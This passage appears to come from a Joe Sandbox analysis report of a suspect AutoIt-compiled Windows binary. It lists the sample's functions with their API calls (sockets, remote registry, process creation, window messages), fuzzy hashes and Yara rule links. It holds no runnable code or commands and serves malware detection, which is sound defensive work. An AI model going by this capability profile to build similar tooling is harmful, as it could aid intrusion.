Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: c2e81f4e32abc946d585cc505f185532d547fecd10449d94fa285b1404e7c51f
Instruction ID: f503855bb679a8bb7d6c34fb5f58ee53208db7190efc0b2b7264ddc01d2cc128
Opcode Fuzzy Hash: c2e81f4e32abc946d585cc505f185532d547fecd10449d94fa285b1404e7c51f
Instruction Fuzzy Hash: 4531EA71D01109BFDB15DF90DC89AFFBBBCEB08300F00416AE605A2651D7749E8A9AA8

Function 004162CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004162EC
GetWindowLongW.USER32(012E61C0,000000F0), ref: 0041631F
GetWindowLongW.USER32(012E61C0,000000F0), ref: 00416354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00416386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004163B0
GetWindowLongW.USER32(00000000,000000F0), ref: 004163C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004163DB

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 467da85e65bb3dc64c1139dd062e3557f6b5c52ef844b102daeb67d6791228f5
Instruction ID: f67943887840f96158da433444fbe8e928577c3e17945a7d4da33308a9900592
Opcode Fuzzy Hash: 467da85e65bb3dc64c1139dd062e3557f6b5c52ef844b102daeb67d6791228f5
Instruction Fuzzy Hash: 913113306402449FDB20DF19EC84FA937E1BB4A715F1A41B9F9208B3B2CB75E8858B59

Function 003EDAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003EDB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003EDB54
SysAllocString.OLEAUT32(00000000), ref: 003EDB57
SysAllocString.OLEAUT32(?), ref: 003EDB75
SysFreeString.OLEAUT32(?), ref: 003EDB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 003EDBA3
SysAllocString.OLEAUT32(?), ref: 003EDBB1

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 81383252a411bc76cfdbbe2e3b065119fea2ed29dcfe7b66966246e9517cd9e3
Instruction ID: d4257903ed0c81451bca8403a2b8c991546490375c8f5702d9ddbc8584cb77d4
Opcode Fuzzy Hash: 81383252a411bc76cfdbbe2e3b065119fea2ed29dcfe7b66966246e9517cd9e3
Instruction Fuzzy Hash: 7521A73660022AAFDF11DFA9DC84CFB73ACEB09360B018635F914DB290E670DC458764

Function 00406173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00407D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00407DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004061C6
WSAGetLastError.WSOCK32(00000000), ref: 004061D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0040620E
connect.WSOCK32(00000000,?,00000010), ref: 00406217
WSAGetLastError.WSOCK32 ref: 00406221
closesocket.WSOCK32(00000000), ref: 0040624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00406263

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 74e52acf2646dc6c2e9a4ee865c7dcbc8271ff8414924b125ee169dc9d961656
Instruction ID: c3d0e1110f1c93db37efedea555dd212f31a7502fea7cf2f4b9f272474be18e2
Opcode Fuzzy Hash: 74e52acf2646dc6c2e9a4ee865c7dcbc8271ff8414924b125ee169dc9d961656
Instruction Fuzzy Hash: 4331B031600108ABDF10AF64CC85BBA77A9EF45760F05807EFD06AB2D1DB78AC158AA5

Function 003EF65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 003EF671
__wcsnicmp.LIBCMT ref: 003EF692
__wcsnicmp.LIBCMT ref: 003EF6AC

Strings

#OnAutoItStartRegister, xrefs: 003EF6A6
#requireadmin, xrefs: 003EF68C
#notrayicon, xrefs: 003EF669

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: d28dd880e5ed3b54e3268ddfbf8c98fee0968c78f483fcfd9e6b1968969e48c6
Instruction ID: cc9192e000dcb659d57808c1f60d35886aa2e2b9b0b035e397a78c53875eb050
Opcode Fuzzy Hash: d28dd880e5ed3b54e3268ddfbf8c98fee0968c78f483fcfd9e6b1968969e48c6
Instruction Fuzzy Hash: 212164722045B16FD623AA36AC03FE77398EF55384F51423AF9428B4D1EBE09D81C294

Function 003EDBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003EDC09
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 003EDC2F
SysAllocString.OLEAUT32(00000000), ref: 003EDC32
SysAllocString.OLEAUT32 ref: 003EDC53
SysFreeString.OLEAUT32 ref: 003EDC5C
StringFromGUID2.OLE32(?,?,00000028), ref: 003EDC76
SysAllocString.OLEAUT32(?), ref: 003EDC84

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: bbc5eb820cde27832a1f0b223d92d1c28f03a299bf01ae04adb45b1040ca3b0f
Instruction ID: 9bd7fe6de879c10cfb9b54ecdfebdb3761f9207b10e4102e6a998e72e4e4ad90
Opcode Fuzzy Hash: bbc5eb820cde27832a1f0b223d92d1c28f03a299bf01ae04adb45b1040ca3b0f
Instruction Fuzzy Hash: 47218335604254AFAB15EFA9DC88DEB77ECEB08360B11C235F914CB2A0DAB0EC45C764

Function 004175CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00391D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00391D73
Part of subcall function 00391D35: GetStockObject.GDI32(00000011), ref: 00391D87
Part of subcall function 00391D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00391D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00417632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0041763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0041764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00417659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00417665

Strings

Msctls_Progress32, xrefs: 00417603

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 307711a4d32a886181025c5ef6471cb3fa52964900d8128f30ae3ae50a373695
Instruction ID: beea113abd7d188600cd91840784c4577053fd1bd9996940d5aa5f40b5aed945
Opcode Fuzzy Hash: 307711a4d32a886181025c5ef6471cb3fa52964900d8128f30ae3ae50a373695
Instruction Fuzzy Hash: C611B6B1150219BFEF118F64CC85EE77F6DEF087A8F114115B604A6050C7769C62DBA4

Function 003B9AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 003B9AE6

Part of subcall function 003B3187: EncodePointer.KERNEL32(00000000), ref: 003B318A
Part of subcall function 003B3187: __initp_misc_winsig.LIBCMT ref: 003B31A5
Part of subcall function 003B3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 003B9EA0
Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003B9EB4
Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003B9EC7
Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003B9EDA
Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003B9EED
Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 003B9F00
Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 003B9F13
Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 003B9F26
Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 003B9F39
Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 003B9F4C
Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 003B9F5F
Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 003B9F72
Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 003B9F85
Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 003B9F98
Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 003B9FAB
Part of subcall function 003B3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003B9FBE

__mtinitlocks.LIBCMT ref: 003B9AEB
__mtterm.LIBCMT ref: 003B9AF4

Part of subcall function 003B9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,003B9AF9,003B7CD0,0044A0B8,00000014), ref: 003B9C56
Part of subcall function 003B9B5C: _free.LIBCMT ref: 003B9C5D
Part of subcall function 003B9B5C: DeleteCriticalSection.KERNEL32(02E,?,?,003B9AF9,003B7CD0,0044A0B8,00000014), ref: 003B9C7F

__calloc_crt.LIBCMT ref: 003B9B19
__initptd.LIBCMT ref: 003B9B3B
GetCurrentThreadId.KERNEL32 ref: 003B9B42

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 45d036f955753236cecd5ecac1648bad4e14b963bb0ccfd594e702202f0e6eff
Instruction ID: 81bc892526e0153a587cb19eb0c1cb37a0143f1238eb04842704b55418999b0c
Opcode Fuzzy Hash: 45d036f955753236cecd5ecac1648bad4e14b963bb0ccfd594e702202f0e6eff
Instruction Fuzzy Hash: 73F090725097116AE637B776BC037CA2794EF0273CF214A2FF764CA9D2EF20894142A4

Function 0041B635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0041B644
_memset.LIBCMT ref: 0041B653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00456F20,00456F64), ref: 0041B682
CloseHandle.KERNEL32 ref: 0041B694

Strings

doE, xrefs: 0041B64D
oE, xrefs: 0041B63E

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: oE$doE
API String ID: 3277943733-3208451510
Opcode ID: 4674bae02336f59d96942ead4e0df6e11251f3ca0d47d7de3c53585c569c2e2f
Instruction ID: f3e86ead181a1671e1603cf277aaa50415ffa44e67b3c896642c61f645bb7ae4
Opcode Fuzzy Hash: 4674bae02336f59d96942ead4e0df6e11251f3ca0d47d7de3c53585c569c2e2f
Instruction Fuzzy Hash: 75F05EB39403047AE6102761BC06FBB3A9CEB08396F418531BE09EA1A3D7759C00C7AC

Function 003B406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,003B3F85), ref: 003B4085
GetProcAddress.KERNEL32(00000000), ref: 003B408C
EncodePointer.KERNEL32(00000000), ref: 003B4097
DecodePointer.KERNEL32(003B3F85), ref: 003B40B2

Strings

RoUninitialize, xrefs: 003B4074
combase.dll, xrefs: 003B4080

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 4e0b3c5239501934df64eea432319f869f3eb7b9a52c774327787d4b930eec41
Instruction ID: c3579a5e86ef698a76866dabc573bc7fa0023249962e4fb74886e7d9180ba875
Opcode Fuzzy Hash: 4e0b3c5239501934df64eea432319f869f3eb7b9a52c774327787d4b930eec41
Instruction Fuzzy Hash: D4E09270691B00ABEA10AF71ED09B857AA5B714787F608135F611E10A2CFB68609EA1C

Function 003F64B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003F660B
_memmove.LIBCMT ref: 003F6546

Part of subcall function 00399837: __itow.LIBCMT ref: 00399862
Part of subcall function 00399837: __swprintf.LIBCMT ref: 003998AC

_memmove.LIBCMT ref: 003F65B9
_memmove.LIBCMT ref: 003F66A0
_memmove.LIBCMT ref: 003F66B9
_memmove.LIBCMT ref: 003F66D5

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 930e372e5f39bfc8ea219d407a9ad98eb2a4a18274e6ba2047c3b3768861095b
Instruction ID: 8770300e4e3ad2c438c5269e0f5a8b9d97f5f2aba51ca423e017e94efd42c62a
Opcode Fuzzy Hash: 930e372e5f39bfc8ea219d407a9ad98eb2a4a18274e6ba2047c3b3768861095b
Instruction Fuzzy Hash: DE617A3090065A9BCF07EF64CC82AFE37A9AF49308F044519FA59AF192EB35ED05CB50

Function 004101E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22

Part of subcall function 00410E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0040FDAD,?,?), ref: 00410E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004102BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004102FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00410320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00410349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0041038C
RegCloseKey.ADVAPI32(00000000), ref: 00410399

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 81d868107e9483471eff935589356c44cad2488c808150919b26d116d4266d3a
Instruction ID: 2de3e3cd27ec9f1a07dae6581bd8ac972586ce2f994da47e37f2ae65e72eabac
Opcode Fuzzy Hash: 81d868107e9483471eff935589356c44cad2488c808150919b26d116d4266d3a
Instruction Fuzzy Hash: EF519D312082049FCB15EF64C845EAFBBE8FF89314F00492EF9558B2A1DB71E985CB56

Function 00415799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 004157FB
GetMenuItemCount.USER32(00000000), ref: 00415832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0041585A
GetMenuItemID.USER32(?,?), ref: 004158C9
GetSubMenu.USER32(?,?), ref: 004158D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 00415928

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: da74c23c884a127c3df63c2900643b04a9dfac391c9937ebbb3adf2e9216ef97
Instruction ID: aacfd582f4d89c544bc92e98f8be68fae06764676f79358ea67c80425a0279b6
Opcode Fuzzy Hash: da74c23c884a127c3df63c2900643b04a9dfac391c9937ebbb3adf2e9216ef97
Instruction Fuzzy Hash: 44517E71E00A15EFCF01EF64C845AEEB7B5EF48320F10406AE905BB351CB74AE828B95

Function 003EEEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 003EEF06
VariantClear.OLEAUT32(00000013), ref: 003EEF78
VariantClear.OLEAUT32(00000000), ref: 003EEFD3
_memmove.LIBCMT ref: 003EEFFD
VariantClear.OLEAUT32(?), ref: 003EF04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 003EF078

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 40c502a544740cc22a386b0c83ff7409be95348625f63fd1ae90f7abfc863474
Instruction ID: 0eaf1d70dad044c270186126ad05e324e70318947851c8df0b81780a52fdb8f2
Opcode Fuzzy Hash: 40c502a544740cc22a386b0c83ff7409be95348625f63fd1ae90f7abfc863474
Instruction Fuzzy Hash: C5516AB5A00259EFCB14CF58C880AAAB7B8FF4C314B158669ED59DB341E375E911CFA0

Function 003F220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003F2258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003F22A3
IsMenu.USER32(00000000), ref: 003F22C3
CreatePopupMenu.USER32 ref: 003F22F7
GetMenuItemCount.USER32(000000FF), ref: 003F2355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 003F2386

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: c4bacf141a68e7e53866c1bcfe7a988054d3be1606bb502a4828bea0db1a10a7
Instruction ID: b16f33840525694d6d293901e03cf0e9d0c87d7f030f863974a45bc931628b5c
Opcode Fuzzy Hash: c4bacf141a68e7e53866c1bcfe7a988054d3be1606bb502a4828bea0db1a10a7
Instruction Fuzzy Hash: 1951CFB460020DEFDF22CF68C888BBFBBF5AF05318F15462AEA519B291D3748904CB51

Function 00391765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00392612: GetWindowLongW.USER32(?,000000EB), ref: 00392623

BeginPaint.USER32(?,?,?,?,?,?), ref: 0039179A
GetWindowRect.USER32(?,?), ref: 003917FE
ScreenToClient.USER32(?,?), ref: 0039181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0039182C
EndPaint.USER32(?,?), ref: 00391876

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
